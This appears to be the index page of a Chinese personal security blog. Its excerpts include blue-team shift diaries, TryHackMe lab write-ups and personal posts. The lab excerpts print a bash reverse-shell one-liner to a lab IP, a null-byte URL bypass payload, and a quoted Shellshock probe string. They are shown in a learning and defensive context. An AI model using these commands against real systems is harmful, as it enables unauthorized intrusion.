值守1
发现一个攻击User-Agent字段写成:() { :; }; echo; echo; /bin/bash -c 'expr 806871720 + 865969209',这段代码的含义是定义了一个空函数,然后紧跟着执行了/bin/bash -c 'expr 806871720 + 865969209'命令,计算两个数字的和,目的是测试命令执行是否成功如果存在Shellshock漏洞,Bash会执行这条命令,返回结果,攻击者就能确认漏洞存在,但看了下被阻断了,后续再观察下攻击者:192.168.75.61 疑似蠕虫病毒反连域名告警显示:主机访问大量可解析随机域名,并且都解析到同一个IP
【学习笔记】[THM]Red Teaming--Red Team Recon(信息收集)
内置工具(系统可识别并自下载的)whois一般能查到以下信息: 12345678910Registrar WHOIS server 注册 WHOIS 服务器Registrar URL 注册 URLRecord creation date 记录创建日期Record update date 记录更新日期Registrant contact info and address (unless withheld for privacy)注册人的联系信息和地址(除非出于隐私考虑而保留)Admin contact info and address (unless withheld for privacy)管理员联系信息和地址(除非出于隐私原因而保留)Tech contact info and address (unless withheld for privacy)技术联系信息和地址(除非出于隐私原因而隐瞒) 但一般都会有隐瞒,以我博客为例,基本全隐瞒了 nslookup使用默认 DNS 服务器来获取与域相关的 A 和 AAAA...
[THM]Pickle Rick
一上来就是脑洞网站首页源码找到用户名扫目录扫到/robots.txt给了个字符串,推测是密码登录成功来到一个执行命令的页面先看看有啥 第一个flag1tac Sup3rS3cretPickl3Ingred.txt 12cat疑似被过滤 第二个flag谜语人啊,clue.txt说在其他目录能找到,但又没说在哪弹shell看看 1bash -c "bash -i >& /dev/tcp/10.21.170.43/404 0>&1" 在/home/rick下找到 第三个flagsudo -i直接提权了然后在/root下找到
随笔4---免密支付是这世上最恶心的设计(playstation退款风波)
索尼尼美舒利看ff16的dlc还不错,就想着买个季票直接把俩dlc全拿下了,结果不知道购物车里为什么有个完全版的ff16,然后就是手柄误触了,想从购物车删除,还在找点哪呢,结果点到购买,然后我想着应该要叫我输密码的,结果直接微信来个提示6,我只能说,直接免密扣款啊 客服也尼美舒利然后就是去官网提交退款邮件,然后嘞,本体嘛是23年购买光盘进行游玩的,完全版里包含本体,所以,hhtmlgbd尼美舒利😅 好在交易历史里有当时光盘版的交易id,重新提交了一个退款邮件,并附上了这个交易id,希望能成功吧,要不然就要打电话去battle了 收回诋毁索尼以及客服的话结果如下,嗯之前没说清楚,钱回来了就行
随笔6---失败的端午出行
唉下雨5.30就来住酒店了,31感觉累然后也不知道去哪玩,就待酒店待了一天,然后也做做攻略,计划好去两个地方玩到了今天,woc下暴雨,会累,那tmd又要待酒店了,唉,等雨停了下去走走吧 酒店环境ok奥确实环境牛逼,听别人说是老四星
[THM]owasp top10
403绕过空字节绕过访问显示403在url后面加个%00 1http://10.10.226.221/ftp/package.json.bak%00 由于我们可以通过 URL 下载它,因此需要将%00编码为 URL 编码格式,变成%2500,然后再补上一个后缀,随便md啊txt都行,看情况 1http://10.10.226.221/ftp/package.json.bak%2500.md 文件上传文件覆盖(一个以前一直忽略的点,但实战应该遇不到)直接源码里面找图片文件然后上传的时候文件名改成跟它相同的造成文件覆盖(如果它的路径也是上传路径就会造成覆盖) gobuster:探测文件结构工具1sudo apt install gobuster 然后直接扫 1gobuster dir -u http://shell.uploadvulns.thm/ -w...
中东欧博览会重保日记3
误报,还以为打进来了看到一个一直扫的后来跟客户那里的白名单一对,包误报的
中东欧博览会重保日记2
一夜无事应该,狠狠打游戏
中东欧博览会重保日记1
晚班九到九基本上就是看两个个设备了,aptailpha 巡检客户没给我们开通机房门禁,只需要远程巡检,还是用的客户电脑,简单的就是耗时间,很多版本信息啥的找不到 成果永封ip 1222.133.112.12 猛炫零食
白嫖cursor
赶上好时候了用国内edu邮箱嫖来的

![【学习笔记】[THM]Red Teaming--Red Team Recon(信息收集)](/img/cover/3.webp)
![[THM]Pickle Rick](/img/cover/4.webp)





![[记录]尝试shiro有key无链利用,但失败](/img/c1/3.webp)